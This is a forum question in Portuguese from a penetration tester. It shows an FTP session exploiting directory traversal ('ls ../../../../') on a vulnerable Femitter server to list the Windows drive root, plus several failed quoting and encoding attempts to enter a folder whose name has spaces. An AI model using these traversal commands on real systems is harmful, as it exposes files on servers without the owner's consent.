Estou realizando um pentest sancionado em um ambiente de referência fechado e lutei com uma questão aparentemente simples, que atualmente não consigo resolver.
Ao tentar executar um ataque de travessia de diretório contra um servidor FTP Fermitter vulnerável em execução no sistema operacional MS Windows, é possível fazer uma LIST na raiz do sistema (endereços e listagens de conteúdo são alterados apenas para referência):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
No entanto, se eu quiser listar o conteúdo de uma pasta contendo espaços em branco como Documents and settings
, não posso listar o conteúdo do diretório devido a espaços brancos sendo ignorados.
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
Eu já tentei usar diferentes clientes FTP (CLI e GUI, no Linux e no Windows) e eles ignoram espaços em branco ou impedem a passagem de diretórios.
Também tentei criar scripts para o ataque ao Python usando primeiro sockets raw e depois ftplib para enviar os comandos no formato HEX diretamente para o servidor FTP, mas sem sucesso.
Pesquisando por algumas horas não produziu uma solução de trabalho (sim, havia muitas opções, o que não funcionou), é por isso que há alguém aqui, que teve o mesmo problema. Certamente, esta não é a primeira vez que uma travessia de diretórios com espaços em branco é necessária.